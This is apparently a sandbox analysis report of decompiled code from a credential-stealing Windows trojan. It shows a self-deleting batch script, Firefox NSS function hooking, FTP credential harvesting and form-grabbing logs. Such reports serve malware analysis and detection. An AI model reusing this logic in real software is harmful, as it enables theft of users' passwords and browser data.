                				if(E0040A4FB( &_v2724, 0x474,  &_v1164, ":d\r\nrd /S /Q \"%s\"\r\nrd /S /Q \"%s\"\r\nif exist \"%s\" goto d\r\nif exist \"%s\" goto d") > 0) {
                					E0040EABE(0,  &_v1164);
                				}
                				if( *0x41979c == 0xffffffff) {
                					ExitProcess(0);
                				}
                				return 1;
                			}
                0x00408e58
                0x00408e65
                0x00408e6a
                0x00408e71
                0x00408e7f
                0x00408e83
                0x00408e8a
                0x00408e92
                0x00408e94
                0x00408e9b
                0x00408e9c
                0x00408eac
                0x00408eb1
                0x00408eb5
                0x00408ebf
                0x00408ed5
                0x00408ee8
                0x00408eea
                0x00408eee
                0x00408ef3
                0x00000000
                0x00000000
                0x00408ef3
                0x00000000
                0x00408ee8
                0x00408efc
                0x00408f08
                0x00408f0f
                0x00408f16
                0x00408f1f
                0x00408f3b
                0x00408f4a
                0x00408f50
                0x00408f58
                0x00408f60
                0x00408f68
                0x00408f84
                0x00408f89
                0x00408f89
                0x00408f95
                0x00408f98
                0x00408f98
                0x00408fa6

                APIs
                • PathRemoveFileSpecW.SHLWAPI(?,00000000), ref: 00408E7F
                • PathRemoveFileSpecW.SHLWAPI(?,00000001), ref: 00408E92
                  • Part of subcall function 00408473: SetEvent.KERNEL32(00408EA1,00000000), ref: 00408479
                  • Part of subcall function 00408473: WaitForSingleObject.KERNEL32(FFFFFFFF,000000FF), ref: 0040848C
                • SHDeleteValueW.SHLWAPI(80000001,Software\Microsoft\Windows\Currentversion\Run,00000000,FF220823,00000000,00000000,00000000), ref: 00408EC6
                • Sleep.KERNEL32(000001F4), ref: 00408ED5
                  • Part of subcall function 0040EF91: RegOpenKeyExW.ADVAPI32(80000001,77E49EB0,00000000,00000001,00000000,Software\Microsoft\Internet Explorer\Privacy,00000000,?,?,00412E9B,Software\Microsoft\Internet Explorer\Privacy,CleanCookies,80000001,Software\Microsoft\Internet Explorer\PhishingFilter,00000000), ref: 0040EFB3
                  • Part of subcall function 0040EF91: RegQueryValueExW.ADVAPI32(00000000,?,00000000,00000000,00000000,00000000,Software\Microsoft\Internet Explorer\Privacy,00000000,?,?,00412E9B,Software\Microsoft\Internet Explorer\Privacy,CleanCookies,80000001,Software\Microsoft\Internet Explorer\PhishingFilter,00000000), ref: 0040EFC7
                  • Part of subcall function 0040EF91: RegCloseKey.ADVAPI32(00000000,?,?,00412E9B,Software\Microsoft\Internet Explorer\Privacy,CleanCookies,80000001,Software\Microsoft\Internet Explorer\PhishingFilter,00000000,?,77E49EB0,00000000), ref: 0040EFDD
                • SHDeleteKeyW.SHLWAPI(80000001,?,00000002), ref: 00408F1F
                • CharToOemW.USER32 ref: 00408F3B
                • CharToOemW.USER32 ref: 00408F4A
                • ExitProcess.KERNEL32 ref: 00408F98
                Strings
                • Software\Microsoft\Windows\Currentversion\Run, xrefs: 00408EB5, 00408EC4, 00408EE0
                • :drd /S /Q "%s"rd /S /Q "%s"if exist "%s" goto dif exist "%s" goto d, xrefs: 00408F69
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Yara matches
                Similarity
                • API ID: CharDeleteFilePathRemoveSpecValue$CloseEventExitObjectOpenProcessQuerySingleSleepWait
                • String ID: :drd /S /Q "%s"rd /S /Q "%s"if exist "%s" goto dif exist "%s" goto d$Software\Microsoft\Windows\Currentversion\Run
                • API String ID: 2884141258-1895817321
                • Opcode ID: 5992843e5619105d50cfe64e688419face4427fce1ae412a7edf3794053a5213
                • Instruction ID: 27dae312fcec22cb3b468773f8c76ee744b9c5fcd2cd83bfc443268b729f7dc5
                • Opcode Fuzzy Hash: 5992843e5619105d50cfe64e688419face4427fce1ae412a7edf3794053a5213
                • Instruction Fuzzy Hash: 8E31D672504344AFD720DB61DD45EDB779CEB84314F00487FB985E3192DB38AA04CBAA
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 70%
                			E00404DB1(void* __ecx, void* __edx, struct HINSTANCE__* __edi) {
                				void* _t6;
                				void* _t12;
                				void* _t13;
                				void* _t14;
                
                				_t14 = __edx;
                				_t13 = __ecx;
                				 *0x419140 = GetProcAddress(__edi, "PR_OpenTCPSocket");
                				 *0x419150 = GetProcAddress(__edi, "PR_Close");
                				 *0x419160 = GetProcAddress(__edi, "PR_Read");
                				 *0x419170 = GetProcAddress(__edi, "PR_Write");
                				ResetEvent( *0x419540);
                				_push(0);
                				_push(0x419140);
                				_t6 = 4;
                				_t12 = E00404B67(_t6, _t13, _t14);
                				if(_t12 != 0) {
                					E0041415B(__edi,  *0x419148,  *0x419158,  *0x419168,  *0x419178);
                				}
                				SetEvent( *0x419540);
                				return _t12;
                			}
                0x00404db1
                0x00404db1
                0x00404dc7
                0x00404dd4
                0x00404de1
                0x00404dee
                0x00404df3
                0x00404df9
                0x00404dfb
                0x00404e02
                0x00404e08
                0x00404e0c
                0x00404e28
                0x00404e28
                0x00404e33
                0x00404e3d

                APIs
                • GetProcAddress.KERNEL32(00000000,PR_OpenTCPSocket), ref: 00404DBF
                • GetProcAddress.KERNEL32(00000000,PR_Close), ref: 00404DCC
                • GetProcAddress.KERNEL32(00000000,PR_Read), ref: 00404DD9
                • GetProcAddress.KERNEL32(00000000,PR_Write), ref: 00404DE6
                • ResetEvent.KERNEL32(?,00000000,00407783,?,00000000), ref: 00404DF3
                  • Part of subcall function 00404B67: VirtualAllocEx.KERNEL32(000000FF,00000000,00000012,00003000,00000040,?,?,00000000,?,?,?,00404DB0,00419020,00000001,00407798,00000000), ref: 00404BA6
                  • Part of subcall function 00404B67: ResetEvent.KERNEL32(?,?,00000000,?,?,?,00404DB0,00419020), ref: 00404BC2
                  • Part of subcall function 00404B67: SetEvent.KERNEL32(?,?,00000000,?,?,?,00404DB0,00419020), ref: 00404C9F
                • SetEvent.KERNEL32(00419140,00000000,?,00000000,00407783,?,00000000), ref: 00404E33
                  • Part of subcall function 0041415B: InitializeCriticalSection.KERNEL32(0041AC38,74B04EE0,00404E2D,00419140,00000000,?,00000000,00407783,?,00000000), ref: 00414171
                  • Part of subcall function 0041415B: GetProcAddress.KERNEL32(00000000,PR_GetNameForIdentity), ref: 004141AD
                  • Part of subcall function 0041415B: GetProcAddress.KERNEL32(PR_SetError), ref: 004141BF
                  • Part of subcall function 0041415B: GetProcAddress.KERNEL32(PR_GetError), ref: 004141D1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Yara matches
                Similarity
                • API ID: AddressProc$Event$Reset$AllocCriticalInitializeSectionVirtual
                • String ID: PR_Close$PR_OpenTCPSocket$PR_Read$PR_Write
                • API String ID: 2746672884-3954199073
                • Opcode ID: 19dcf1b562fd6698ebbfad3239ffc7a8068a609369cc3f646225dde36a539c0e
                • Instruction ID: f68731996ce1dc3816c835a3cfa57d29c91cc47d366084438b166cd5ef857572
                • Opcode Fuzzy Hash: 19dcf1b562fd6698ebbfad3239ffc7a8068a609369cc3f646225dde36a539c0e
                • Instruction Fuzzy Hash: 42F01D75940212BAE7111F72EC2DEC63FA9B7897547104437F601BB2B0D7B94880DB4C
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 92%
                			E00406664(void* __ecx, signed char* __edx, void* __eflags, intOrPtr _a4) {
                				char _v524;
                				intOrPtr _v532;
                				char _v536;
                				char* _v544;
                				signed int _v548;
                				char* _v552;
                				char* _v556;
                				void* _v564;
                				char* _v568;
                				char* _v572;
                				char* _v576;
                				void* __edi;
                				void* __esi;
                				void* _t60;
                				char* _t61;
                				char* _t63;
                				char* _t66;
                				char** _t71;
                				char* _t79;
                				void* _t83;
                				char* _t84;
                				char* _t85;
                				char* _t99;
                				char* _t100;
                				char* _t105;
                				char* _t111;
                				char* _t112;
                				signed int _t122;
                				char* _t123;
                				char** _t124;
                				intOrPtr _t125;
                				signed int _t126;
                				void* _t128;
                
                				_t128 = (_t126 & 0xfffffff8) - 0x234;
                				if(E0040B635( &(__edx[0x2c]),  &_v524, __ecx) == 0) {
                					L31:
                					return 1;
                				}
                				_t131 =  *__edx & 0x00000010;
                				if(( *__edx & 0x00000010) == 0) {
                					_push( &_v524);
                					_t60 = 2;
                					_t61 = E0040B046(_t60,  &_v524,  &_v536);
                					__eflags = _t61;
                					if(_t61 == 0) {
                						goto L31;
                					}
                					_t63 = E0040A016(_v532,  &_v564, _v536, 1, 0);
                					_v556 = _t63;
                					__eflags = _t63 - 0xffffffff;
                					if(_t63 == 0xffffffff) {
                						L30:
                						E0040B0EE( &_v536);
                						goto L31;
                					}
                					_t66 = HeapAlloc( *0x41a570, 8, 0x626);
                					_v552 = _t66;
                					__eflags = _t66;
                					if(_t66 == 0) {
                						L29:
                						E004097F7(_v552);
                						E00409813(_v548, _v568);
                						goto L30;
                					}
                					_v548 = 0;
                					__eflags = _v544;
                					if(_v544 > 0) {
                						do {
                							_t122 = _v548 << 2;
                							_t71 = _v564 + _t122;
                							__eflags =  *_t71;
                							if( *_t71 == 0) {
                								goto L28;
                							}
                							_v564 = StrStrIA( *_t71, ";server=");
                							_t111 = StrStrIA( *(_t122 + _v568), ";port=");
                							_v568 = StrStrIA(_v572[_t122], ";user=");
                							_t79 = StrStrIA(_v576[_t122], ";password=");
                							__eflags = _v576;
                							_t123 = _t79;
                							if(_v576 == 0) {
                								goto L28;
                							}
                							__eflags = _v572;
                							if(_v572 == 0) {
                								goto L28;
                							}
                							__eflags = _t123;
                							if(_t123 == 0) {
                								goto L28;
                							}
                							_v576 =  &(_v576[8]);
                							_v572 =  &(_v572[6]);
                							_t124 =  &(_t123[0xa]);
                							E0040663C(_v576);
                							E0040663C(_v572);
                							E0040663C(_t124);
                							__eflags = _t111;
                							if(_t111 == 0) {
                								L15:
                								_t83 = 0x15;
                								L16:
                								_t112 = _v576;
                								__eflags =  *_t112;
                								if( *_t112 == 0) {
                									goto L28;
                								}
                								_t105 = _v572;
                								__eflags =  *_t105;
                								if( *_t105 == 0) {
                									goto L28;
                								}
                								_t99 =  *_t124;
                								__eflags = _t99;
                								if(_t99 == 0) {
                									goto L28;
                								}
                								__eflags = _t99 - 0x30;
                								if(_t99 == 0x30) {
                									L21:
                									__eflags = _t124[0];
                									if(_t124[0] == 0) {
                										goto L28;
                									}
                									L22:
                									_t100 = 0;
                									__eflags =  *_t124;
                									if( *_t124 == 0) {
                										goto L28;
                									} else {
                										goto L23;
                									}
                									do {
                										L23:
                										_t100[_t124] = _t100[_t124] ^ 0x00000019;
                										_t100 =  &(_t100[1]);
                										__eflags = _t100[_t124];
                									} while (_t100[_t124] != 0);
                									__eflags = _t100;
                									if(_t100 > 0) {
                										_push(_t83);
                										_push(_t112);
                										_t113 = _v568;
                										_push(_t124);
                										_push(_t105);
                										_t84 = E0040A4B7(_t83, 0x311, _v568, L"ftp://%S:%S@%S:%u\n");
                										_t128 = _t128 + 0x14;
                										__eflags = _t84;
                										if(_t84 > 0) {
                											_t125 = _a4;
                											_t85 = E00409B2A(_t84, _t125, _t113);
                											__eflags = _t85;
                											if(_t85 != 0) {
                												_t46 = _t125 + 4;
                												 *_t46 =  &(( *(_t125 + 4))[1]);
                												__eflags =  *_t46;
                											}
                										}
                									}
                									goto L28;
                								}
                								__eflags = _t99 - 0x31;
                								if(_t99 != 0x31) {
                									goto L22;
                								}
                								goto L21;
                							}
                							_t114 =  &(_t111[6]);
                							_v556 =  &(_t111[6]);
                							E0040663C(_t114);
                							_t83 = E00409DCE(_v556, _t114, 0);
                							__eflags = _t83 - 1;
                							if(_t83 < 1) {
                								goto L15;
                							}
                							__eflags = _t83 - 0xffff;
                							if(_t83 <= 0xffff) {
                								goto L16;
                							}
                							goto L15;
                							L28:
                							_v548 = _v548 + 1;
                							__eflags = _v548 - _v544;
                						} while (_v548 < _v544);
                					}
                					goto L29;
                				} else {
                					_v552 = L"ftplist.txt";
                					E0040B4D8( &_v524,  &_v552, _t131, 1, 5, E00406664, _a4, 0, 0, 0);
                					goto L31;
                				}
                			}

                APIs
                  • Part of subcall function 0040B635: PathCombineW.SHLWAPI(?,?,00401EC0,004076D9,?,?,?,00000000), ref: 0040B64C
                • HeapAlloc.KERNEL32(00000008,00000626,?,00000001,00000000,?,?), ref: 00406704
                • StrStrIA.SHLWAPI(?,;server=), ref: 00406747
                • StrStrIA.SHLWAPI(?,;port=), ref: 00406759
                • StrStrIA.SHLWAPI(?,;user=), ref: 00406769
                • StrStrIA.SHLWAPI(?,;password=), ref: 0040677B
                  • Part of subcall function 0040B4D8: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 0040B517
                  • Part of subcall function 0040B4D8: WaitForSingleObject.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 0040B53E
                  • Part of subcall function 0040B4D8: PathMatchSpecW.SHLWAPI(?,?,?,?,?,00000000), ref: 0040B589
                  • Part of subcall function 0040B4D8: Sleep.KERNEL32(00000000,?,?), ref: 0040B5E6
                  • Part of subcall function 0040B4D8: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 0040B614
                  • Part of subcall function 0040B4D8: FindClose.KERNEL32(?,?,?,?,00000000), ref: 0040B626
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Yara matches
                Similarity
                • API ID: Find$FilePath$AllocCloseCombineFirstHeapMatchNextObjectSingleSleepSpecWait
                • String ID: ;password=$;port=$;server=$;user=$ftp://%S:%S@%S:%u$ftplist.txt
                • API String ID: 1635188419-881966611
                • Opcode ID: 6d400158bb4797d1d0a8e2cbd4ac329376993ba592b68de0d8cb9fa42615cf6a
                • Instruction ID: b887b5950c32a1fe934b624cb454a9501e0daf98c00b7f792d61da5ca74124b7
                • Opcode Fuzzy Hash: 6d400158bb4797d1d0a8e2cbd4ac329376993ba592b68de0d8cb9fa42615cf6a
                • Instruction Fuzzy Hash: 8251BE325043019BD721AF14C841A6BB7E5AF84708F15483EF886B72E2D739DD55CB8A
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 58%
                			E0040E5B1(void* __ebx, void* __ecx, intOrPtr _a4) {
                				char _v8;
                				long _v12;
                				signed int _v16;
                				signed int _v20;
                				char _v24;
                				short _v90;
                				short _v104;
                				struct _OSVERSIONINFOW _v388;
                				void* __edi;
                				struct _OSVERSIONINFOW* _t32;
                				char _t34;
                				void* _t36;
                				void* _t40;
                				short _t42;
                				void* _t49;
                				void* _t52;
                				void* _t53;
                				intOrPtr _t56;
                				signed int _t61;
                
                				_t52 = __ecx;
                				_t49 = __ebx;
                				_v12 = 0x28;
                				if(GetComputerNameW( &_v104,  &_v12) == 0) {
                					E00409833( &_v104,  &M0040269C, 0xe);
                					_v90 = 0;
                				}
                				E004098AA( &_v388,  &_v388, 0, 0x11c);
                				_v388.dwOSVersionInfoSize = 0x11c;
                				if(GetVersionExW( &_v388) != 0) {
                					_push(0x100);
                					_t32 =  &(_v388.szCSDVersion);
                				} else {
                					_push(0x11c);
                					_t32 =  &_v388;
                				}
                				_push(0);
                				_push(_t32);
                				E004098AA(_t32);
                				_push(_t49);
                				_t34 = E0040EDD3(_t52, 0x80000002, L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", L"InstallDate");
                				_v16 = _v16 & 0x00000000;
                				_v24 = _t34;
                				_t36 = E0040EEE6(_t52, 0x80000002, L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", L"DigitalProductId", 0,  &_v8);
                				if(_t36 == 0xffffffff || _t36 <= 0) {
                					_t61 = _v16;
                				} else {
                					_t61 = E0040B855(_v8, _t36);
                					E004097F7(_v8);
                				}
                				_v20 = _t61;
                				_push(E0040B855( &_v24, 8));
                				_t40 = E0040B855( &_v388, 0x11c);
                				_t56 = _a4;
                				_push(_t40);
                				_push( &_v104);
                				_push(L"%s_%08X%08X");
                				_t53 = 0x3c;
                				_t42 = E0040A4B7( &_v104, _t53, _t56);
                				_v12 = _t42;
                				if(_t42 < 1) {
                					E00409833(_t56, L"fatal_error", 0x16);
                					_t42 = 0;
                					 *((short*)(_t56 + 0x16)) = 0;
                				}
                				return _t42;
                			}

                APIs
                • GetComputerNameW.KERNEL32 ref: 0040E5C9
                • GetVersionExW.KERNEL32(?,?,00000000,0000011C), ref: 0040E60D
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Yara matches
                Similarity
                • API ID: ComputerNameVersion
                • String ID: %s_%08X%08X$($DigitalProductId$InstallDate$SOFTWARE\Microsoft\Windows NT\CurrentVersion$fatal_error$unknown
                • API String ID: 3835364902-2859850376
                • Opcode ID: 646ff0f3d839ba5c64a3d73bf179bd1ed0d40931f21abba312f0c69465a900a6
                • Instruction ID: 1f9dce5f25a67d5ddf84c7a19d36106d898544b9e1eb8a585fc8bd09aca5fd90
                • Opcode Fuzzy Hash: 646ff0f3d839ba5c64a3d73bf179bd1ed0d40931f21abba312f0c69465a900a6
                • Instruction Fuzzy Hash: 43318272900218BADB11EAA28D45FEF77BCAF59704F10887BF504F21C1D7799B0587A9
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 95%
                			E00404375(void* __eax, void* __ecx, char* _a4, intOrPtr* _a8, void* _a12) {
                				char _v540;
                				char _v800;
                				char _v804;
                				char _v892;
                				char _v896;
                				char _v908;
                				struct _SYSTEMTIME _v928;
                				struct _SYSTEMTIME _v956;
                				intOrPtr _v984;
                				intOrPtr _v996;
                				intOrPtr _v1000;
                				intOrPtr _v1004;
                				char* _v1008;
                				char _v1011;
                				char _v1012;
                				signed int _v1016;
                				signed short* _v1020;
                				void* _v1024;
                				long _v1028;
                				signed short* _v1032;
                				signed short* _v1036;
                				signed short _v1040;
                				intOrPtr* _v1044;
                				long _v1048;
                				signed int _v1052;
                				signed int _v1056;
                				long _v1060;
                				char _v1064;
                				intOrPtr _v1068;
                				char _v1072;
                				intOrPtr _v1076;
                				intOrPtr _v1080;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				intOrPtr _t148;
                				signed int _t167;
                				long _t185;
                				signed short _t187;
                				signed int _t192;
                				signed int _t194;
                				signed char _t198;
                				signed int _t200;
                				void* _t203;
                				void* _t204;
                				long _t205;
                				long _t206;
                				signed short* _t215;
                				signed short _t216;
                				void* _t218;
                				signed int _t226;
                				intOrPtr* _t230;
                				intOrPtr _t233;
                				long _t256;
                				signed int _t263;
                				intOrPtr* _t267;
                				signed short* _t269;
                				signed short* _t271;
                				long _t274;
                				intOrPtr* _t276;
                				signed int _t277;
                				void* _t279;
                
                				_t279 = (_t277 & 0xfffffff8) - 0x424;
                				_t256 = 0;
                				_v1028 = 0;
                				if(__eax <= 0) {
                					L51:
                					asm("sbb eax, eax");
                					return  ~0x00000000;
                				} else {
                					_t267 = __ecx + 0x10;
                					_v1044 = _t267;
                					_v1024 = __eax;
                					do {
                						_t233 =  *_t267;
                						if(_t233 == _t256) {
                							_t230 = _a8;
                							L6:
                							_t234 =  *(_t267 + 4);
                							_t147 =  *((intOrPtr*)(_t267 + 8)) + _t234;
                							_v1048 = _t256;
                							_v1060 = _t256;
                							_v1016 = _t147;
                							if(_t234 >= _t147) {
                								L36:
                								_t256 = 0;
                								if(( *(_t267 - 0x10) & 0x00000008) == 0) {
                									L46:
                									if(( *(_t267 - 0x10) & 0x00000010) != 0 &&  *((intOrPtr*)(_t267 - 4)) != _t256) {
                										E00407C4A( &_v1012, _t234, 1,  &_v892);
                										if(E0040B74D( &(_v928.wSecond),  *((intOrPtr*)(_t267 - 4)), E0040A398( *((intOrPtr*)(_t267 - 4)))) != 0) {
                											E00409FF5( &_v1012,  &_v908);
                											GetLocalTime( &_v928);
                											E0040EE81( &_v1012,  &_v896,  &_v1016, 3,  &_v928, 0x10);
                										}
                									}
                									goto L50;
                								}
                								if(_v1048 != 0) {
                									L39:
                									if(( *(_t267 - 0x10) & 0x00000200) == 0) {
                										_t167 = E00409A3C(_t147 | 0xffffffff, _t256, _a4);
                										_t258 = _t167;
                										__eflags = _t167;
                										if(__eflags != 0) {
                											_push(_v1048);
                											E00412544(_t234, _t252, __eflags, 0xc9, _t258, 0, L"Grabbed data from: %s\n\n%S", _t258);
                											_t279 = _t279 + 0x18;
                											E004097F7(_t258);
                										}
                									} else {
                										_t252 = 0x3c;
                										E004098AA( &_v1012,  &_v1012, _t256, _t252);
                										_v1008 =  &_v800;
                										_v1024 = _t252;
                										_v1004 = 0x103;
                										if(InternetCrackUrlA(_a4, _t256, _t256,  &_v1024) == 1 && _v1008 > _t256) {
                											GetSystemTime( &_v956);
                											_push(_v956.wDay & 0x0000ffff);
                											_push(_v956.wMonth & 0x0000ffff);
                											_push((_v956.wYear & 0x0000ffff) - 0x7d0);
                											_push( &_v804);
                											_t252 = 0x104;
                											E0040A4B7( &_v804, 0x104,  &_v540, L"grabbed\\%S_%02u_%02u_%02u.txt");
                											_t279 = _t279 + 0x14;
                											E0041235A(_t234, 0x104, 2, 0,  &_v540, _v1064, _v1076);
                											_t267 = _v1080;
                										}
                									}
                									E004097F7(_v1048);
                									_t256 = 0;
                									goto L46;
                								}
                								_t185 = 0x23;
                								_v1060 = _t185;
                								_t147 = E00409B94(_t185, "*NO MATCHES FOUND FOR CURRENT MASK*");
                								_v1052 = _t147;
                								if(_t147 == 0) {
                									goto L46;
                								}
                								goto L39;
                							} else {
                								goto L9;
                								L13:
                								_t252 =  *_t187 & 0x0000ffff;
                								if(_t252 != 4) {
                									_t234 = (_t252 & 0x0000ffff) - 4;
                									_t194 = E00403865(_t187 + 4, 0,  &_v1052, (_t252 & 0x0000ffff) - 4,  *_t230 + _v1056,  *_a12 - _v1056);
                									__eflags = _t194;
                									if(_t194 == 0) {
                										goto L34;
                									} else {
                										__eflags =  *_v1032 - 4;
                										_t271 = _v1036;
                										if( *_v1032 != 4) {
                											_t45 =  &_v1052;
                											 *_t45 = _v1052 + _v1056;
                											__eflags =  *_t45;
                										} else {
                											_v1056 = _v1052;
                										}
                										goto L22;
                									}
                								} else {
                									if( *_t234 != _t252) {
                										_t226 = _v1056;
                									} else {
                										_t226 =  *_a12;
                									}
                									_v1052 = _t226;
                									L22:
                									_t234 = _v1052 - _v1056;
                									_t198 =  *(_v1044 - 0x10);
                									_t263 = ( *_t271 & 0x0000ffff) - 4;
                									_v1040 = _t234;
                									if((_t198 & 0x00000004) == 0) {
                										__eflags = _t198 & 0x00000008;
                										if((_t198 & 0x00000008) != 0) {
                											_t200 = E00409787(_t234 + _t263 + _v1060 + 2,  &_v1048);
                											__eflags = _t200;
                											if(_t200 != 0) {
                												_t274 = _v1048;
                												__eflags = _t263;
                												if(_t263 > 0) {
                													E00409833(_v1060 + _t274,  &(_v1036[2]), _t263);
                													_t75 =  &_v1072;
                													 *_t75 = _v1072 + _t263;
                													__eflags =  *_t75;
                												}
                												_t252 = _v1040;
                												_t203 = E00409833(_v1060 + _t274,  *_t230 + _v1056, _t252);
                												_t234 = _v1056;
                												__eflags =  *(_t234 - 0x10) & 0x00000100;
                												if(( *(_t234 - 0x10) & 0x00000100) == 0) {
                													_t204 = E0040FAE9(_t203, _t252);
                													_t86 =  &_v1064;
                													 *_t86 = _v1064 + _t204;
                													__eflags =  *_t86;
                													_t230 = _a8;
                												} else {
                													_v1060 = _v1060 + _t252;
                												}
                												_t205 = _v1060;
                												 *((char*)(_t205 + _t274)) = 0xa;
                												_t206 = _t205 + 1;
                												__eflags = _t206;
                												_v1060 = _t206;
                												 *((char*)(_t206 + _t274)) = 0;
                											}
                										}
                									} else {
                										_t215 =  *_a12 - _t234 + _t263;
                										_v1032 = _t215;
                										if(_t215 != 0) {
                											_t216 = E004097CC(_t215);
                											_v1040 = _t216;
                											if(_t216 != 0) {
                												_t252 = _v1056;
                												_t218 = E00409833(E00409833(_t216,  *_t230, _v1056) + _v1056,  &(_t271[2]), _t263);
                												_t276 = _a12;
                												_t234 =  *_t230 + _v1076;
                												E00409833(_t218 + _t263 + _v1056,  *_t230 + _v1076,  *_t276 - _v1076);
                												E004097F7( *_t230);
                												_v1068 = _v1068 + 1;
                												 *_t230 = _v1080;
                												 *_t276 = _v1072;
                											}
                										}
                									}
                									L34:
                									_t147 = _v1016;
                									if(_v1020 < _v1016) {
                										_t234 = _v1020;
                										L9:
                										_t187 = _t234 + ( *_t234 & 0x0000ffff);
                										_t269 = ( *_t187 & 0x0000ffff) + _t187;
                										_v1020 = _t269 + ( *_t269 & 0x0000ffff);
                										_t252 =  *_t234 & 0x0000ffff;
                										_v1032 = _t234;
                										_v1040 = _t187;
                										_v1036 = _t269;
                										if(( *_t234 & 0x0000ffff) != 4) {
                											goto L11;
                										} else {
                											_v1056 = _v1056 & 0x00000000;
                											goto L13;
                										}
                									}
                									_t267 = _v1044;
                									goto L36;
                								}
                								L11:
                								_t192 = E00403865( &(_t234[2]),  &_v1056, 0, (_t252 & 0x0000ffff) - 4,  *_t230,  *_a12);
                								__eflags = _t192;
                								if(_t192 == 0) {
                									goto L34;
                								} else {
                									_t271 = _v1036;
                									_t234 = _v1032;
                									_t187 = _v1040;
                									goto L13;
                								}
                							}
                						}
                						_v1011 = 0x2a;
                						_v1012 = 0x3f;
                						_v1008 = _t233;
                						_t148 = E0040A398(_t233);
                						_t230 = _a8;
                						_v1004 = _t148;
                						_v1000 =  *_t230;
                						_v996 =  *_a12;
                						_v984 = 0x12;
                						if(E0040A790( &_v1012) != 0) {
                							goto L6;
                						}
                						L50:
                						_t267 = _t267 + 0x1c;
                						_t139 =  &_v1024;
                						 *_t139 = _v1024 - 1;
                						_v1044 = _t267;
                					} while ( *_t139 != 0);
                					goto L51;
                				}
                			}
                0x00404436
                0x00404434
                0x00404606
                0x00000000
                0x00404606
                0x0040443d
                0x00404454
                0x00404459
                0x0040445b
                0x00000000
                0x00404461
                0x00404461
                0x00404465
                0x00404469
                0x00000000
                0x00404469
                0x0040445b
                0x00404402
                0x004043a5
                0x004043aa
                0x004043af
                0x004043b3
                0x004043b8
                0x004043bb
                0x004043c1
                0x004043ce
                0x004043d2
                0x004043e1
                0x00000000
                0x004043e7
                0x004047ab
                0x004047ab
                0x004047ae
                0x004047ae
                0x004047b2
                0x004047b2
                0x00000000
                0x0040439f

                APIs
                • InternetCrackUrlA.WININET ref: 00404676
                • GetSystemTime.KERNEL32(?), ref: 00404697
                • GetLocalTime.KERNEL32(?,?,?,?,00000000,00000001,?), ref: 00404787
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Yara matches
                Similarity
                • API ID: Time$CrackInternetLocalSystem
                • String ID: *$*NO MATCHES FOUND FOR CURRENT MASK*$?$Grabbed data from: %s%S$grabbed\%S_%02u_%02u_%02u.txt
                • API String ID: 1914253387-996826763
                • Opcode ID: dab875ede379e02140827da2f08b9e519b6961b500cd446d874ec69ed2012110
                • Instruction ID: 76a2d93be6f831bb7f196cf1b4d77e584dbd94ec812c467030a4f4f4d7db9bdc
                • Opcode Fuzzy Hash: dab875ede379e02140827da2f08b9e519b6961b500cd446d874ec69ed2012110
                • Instruction Fuzzy Hash: 22D17CB15083419FD720DF29C880A6BB7E4FFC9708F00492EFA95A7291D778D905CB66
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 92%
                			E00404065(char* __edx, void* __esi) {
                				char _v5;
                				signed int _v12;
                				char _v13;
                				void* _v20;
                				char* _v24;
                				intOrPtr _v64;
                				char* _v68;
                				intOrPtr _v72;
                				void* _v84;
                				char _v348;
                				void* __ebx;
                				void* __edi;
                				intOrPtr _t94;
                				signed char _t95;
                				void* _t101;
                				void* _t104;
                				char* _t112;
                				void* _t117;
                				intOrPtr _t119;
                				void* _t120;
                				intOrPtr _t123;
                				intOrPtr _t124;
                				intOrPtr* _t126;
                				intOrPtr _t130;
                				void* _t133;
                				void* _t134;
                				void* _t135;
                				int _t140;
                				void* _t143;
                				intOrPtr _t145;
